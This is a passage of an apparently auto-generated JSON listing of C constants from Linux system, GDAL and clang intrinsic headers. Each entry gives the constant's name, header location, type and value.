1149 }, { "tag": "const", "name": "_SC_TRACE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:457:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 181 }, { "tag": "const", "name": "LC_MONETARY", "ns": 0, "location": "/usr/include/locale.h:39:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_SC_TRACE_EVENT_FILTER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:459:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 182 }, { "tag": "const", "name": "LC_COLLATE", "ns": 0, "location": "/usr/include/locale.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "LC_TIME", "ns": 0, "location": "/usr/include/locale.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_TRACE_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:461:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 183 }, { "tag": "const", "name": "LC_ALL", "ns": 0, "location": "/usr/include/locale.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "LC_MESSAGES", "ns": 0, "location": "/usr/include/locale.h:40:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_SC_TRACE_LOG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:463:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 184 }, { "tag": "const", "name": "LC_ADDRESS", "ns": 0, "location": "/usr/include/locale.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "LC_NAME", "ns": 0, "location": "/usr/include/locale.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_SC_V6_ILP32_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:448:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 177 }, { "tag": "const", "name": "_SC_V6_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:450:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 178 }, { "tag": "const", "name": "LC_PAPER", "ns": 0, "location": "/usr/include/locale.h:42:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "LC_MEASUREMENT", "ns": 0, "location": "/usr/include/locale.h:46:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "_SC_V6_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:452:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 179 }, { "tag": "const", "name": "LC_TELEPHONE", "ns": 0, "location": "/usr/include/locale.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "_SC_HOST_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:455:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 180 }, { "tag": "const", "name": "_SC_LEVEL1_DCACHE_ASSOC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:474:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 189 }, { "tag": "const", "name": "_SC_LEVEL1_DCACHE_LINESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:476:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 190 }, { "tag": "const", "name": "LC_IDENTIFICATION", "ns": 0, "location": "/usr/include/locale.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "_SC_LEVEL2_CACHE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:478:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 191 }, { "tag": "const", "name": "_SC_LEVEL2_CACHE_ASSOC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:480:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 192 }, { "tag": "const", "name": "_STRINGS_H", "ns": 0, "location": "/usr/include/strings.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_LEVEL1_ICACHE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:466:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 185 }, { "tag": "const", "name": "_SC_LEVEL1_ICACHE_ASSOC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:468:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 186 }, { "tag": "const", "name": "_SC_LEVEL1_ICACHE_LINESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:470:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 187 }, { "tag": "const", "name": "_SC_LEVEL1_DCACHE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:472:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 188 }, { "tag": "const", "name": "_SC_LEVEL4_CACHE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:490:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 197 }, { "tag": "const", "name": "_BITS_LOCALE_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_LOCALE_H", "ns": 0, "location": "/usr/include/locale.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_LEVEL4_CACHE_ASSOC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:492:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 198 }, { "tag": "const", "name": "_SC_LEVEL4_CACHE_LINESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:494:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 199 }, { "tag": "const", "name": "__LC_NUMERIC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__LC_CTYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__LC_COLLATE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_SC_IPV6", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:498:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 235 }, { "tag": "const", "name": "_SC_LEVEL2_CACHE_LINESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:482:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 193 }, { "tag": "const", "name": "__LC_TIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:28:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_LEVEL3_CACHE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:484:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 194 }, { "tag": "const", "name": "__LC_MESSAGES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_SC_LEVEL3_CACHE_ASSOC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:486:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 195 }, { "tag": "const", "name": "_SC_LEVEL3_CACHE_LINESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:488:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 196 }, { "tag": "const", "name": "__LC_MONETARY", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:30:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__LC_NAME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__LC_ALL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "__LC_PAPER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "_SC_V7_LPBIG_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:509:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 240 }, { "tag": "const", "name": "_SC_SS_REPL_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:512:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 241 }, { "tag": "const", "name": "_SC_TRACE_EVENT_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:515:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 242 }, { "tag": "const", "name": "__LC_TELEPHONE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "VSI_STAT_EXISTS_FLAG", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:203:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_TRACE_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:517:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 243 }, { "tag": "const", "name": "__LC_ADDRESS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "VSI_STAT_NATURE_FLAG", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:205:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_RAW_SOCKETS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:500:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 236 }, { "tag": "const", "name": "__LC_IDENTIFICATION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "_SC_V7_ILP32_OFF32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:503:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 237 }, { "tag": "const", "name": "__LC_MEASUREMENT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/locale.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "LC_NUMERIC", "ns": 0, "location": "/usr/include/locale.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_V7_ILP32_OFFBIG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:505:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 238 }, { "tag": "const", "name": "VSI_STAT_SIZE_FLAG", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:207:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "LC_CTYPE", "ns": 0, "location": "/usr/include/locale.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SC_V7_LP64_OFF64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:507:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 239 }, { "tag": "const", "name": "VSI_STAT_SET_ERROR_FLAG", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:209:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_CS_PATH", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:536:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "ENOTNAM", "ns": 0, "location": "/usr/include/asm-generic/errno.h:101:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 118 }, { "tag": "const", "name": "EISNAM", "ns": 0, "location": "/usr/include/asm-generic/errno.h:103:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 120 }, { "tag": "const", "name": "ENAVAIL", "ns": 0, "location": "/usr/include/asm-generic/errno.h:102:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 119 }, { "tag": "const", "name": "_SC_THREAD_ROBUST_PRIO_PROTECT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:529:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 248 }, { "tag": "const", "name": "EREMOTEIO", "ns": 0, "location": "/usr/include/asm-generic/errno.h:104:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 121 }, { "tag": "const", "name": "EDQUOT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:105:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 122 }, { "tag": "const", "name": "_CS_V6_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:539:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_TRACE_USER_EVENT_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:521:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 245 }, { "tag": "const", "name": "ENOMEDIUM", "ns": 0, "location": "/usr/include/asm-generic/errno.h:107:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 123 }, { "tag": "const", "name": "EMEDIUMTYPE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:108:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 124 }, { "tag": "const", "name": "_SC_TRACE_SYS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:519:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 244 }, { "tag": "const", "name": "ENOKEY", "ns": 0, "location": "/usr/include/asm-generic/errno.h:110:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 126 }, { "tag": "const", "name": "ECANCELED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 125 }, { "tag": "const", "name": "_SC_THREAD_ROBUST_PRIO_INHERIT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:527:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 247 }, { "tag": "const", "name": "EKEYEXPIRED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 127 }, { "tag": "const", "name": "_SC_XOPEN_STREAMS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:524:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 246 }, { "tag": "const", "name": "EKEYREVOKED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:112:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "_m_pavgw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2995:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EKEYREJECTED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:113:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 129 }, { "tag": "const", "name": "_m_psadbw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2996:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_POSIX_V5_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:549:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_CS_V7_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:552:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "EOWNERDEAD", "ns": 0, "location": "/usr/include/asm-generic/errno.h:116:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 130 }, { "tag": "const", "name": "ERFKILL", "ns": 0, "location": "/usr/include/asm-generic/errno.h:119:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 132 }, { "tag": "const", "name": "_CS_POSIX_V7_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:553:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "ENOTRECOVERABLE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:117:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 131 }, { "tag": "const", "name": "EHWPOISON", "ns": 0, "location": "/usr/include/asm-generic/errno.h:121:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 133 }, { "tag": "const", "name": "__EMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_GNU_LIBC_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:543:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_CS_LFS_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:556:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1000 }, { "tag": "const", "name": "ENOTSUP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/errno.h:30:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 95 }, { "tag": "const", "name": "_CS_POSIX_V6_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:540:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_CS_V5_WIDTH_RESTRICTED_ENVS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:548:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_CS_GNU_LIBPTHREAD_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:545:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "errno", "ns": 0, "location": "/usr/include/errno.h:38:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "wkb25DBit", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:432:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483648 }, { "tag": "const", "name": "_m_pmaxsw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2986:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pmaxub", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2987:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_LFS64_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:568:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1006 }, { "tag": "const", "name": "_CS_LFS64_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:566:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1005 }, { "tag": "const", "name": "_m_pminsw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2988:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFF32_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:573:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1100 }, { "tag": "const", "name": "_m_pminub", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2989:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_LFS_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:560:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1002 }, { "tag": "const", "name": "_m_pmovmskb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2990:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pmulhuw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2991:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_LFS_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:558:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1001 }, { "tag": "const", "name": "_CS_LFS64_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:570:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1007 }, { "tag": "const", "name": "_m_pshufw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2992:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_LFS64_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:564:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1004 }, { "tag": "const", "name": "_m_maskmovq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2993:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_LFS_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:562:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1003 }, { "tag": "const", "name": "_m_pavgb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2994:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:583:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1105 }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:581:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1104 }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:587:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1107 }, { "tag": "const", "name": "ECONNREFUSED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:94:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 111 }, { "tag": "const", "name": "EHOSTDOWN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:95:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 112 }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:585:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1106 }, { "tag": "const", "name": "EHOSTUNREACH", "ns": 0, "location": "/usr/include/asm-generic/errno.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 113 }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFF32_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:577:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1102 }, { "tag": "const", "name": "EALREADY", "ns": 0, "location": "/usr/include/asm-generic/errno.h:97:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 114 }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFF32_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:575:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1101 }, { "tag": "const", "name": "EINPROGRESS", "ns": 0, "location": "/usr/include/asm-generic/errno.h:98:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 115 }, { "tag": "const", "name": "ESTALE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:99:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 116 }, { "tag": "const", "name": "_m_pextrw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2984:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_XBS5_ILP32_OFF32_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:579:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1103 }, { "tag": "const", "name": "EUCLEAN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 117 }, { "tag": "const", "name": "ogrZMarker", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:464:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 554850065 }, { "tag": "const", "name": "_MM_FLUSH_ZERO_OFF", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2958:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_FLUSH_ZERO_ON", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2957:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "_MM_FLUSH_ZERO_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2956:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "_MM_CMPINT_GE", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_MM_ROUND_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2954:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24576 }, { "tag": "const", "name": "_MM_ROUND_TOWARD_ZERO", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2953:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24576 }, { "tag": "const", "name": "_MM_CMPINT_GT", "ns": 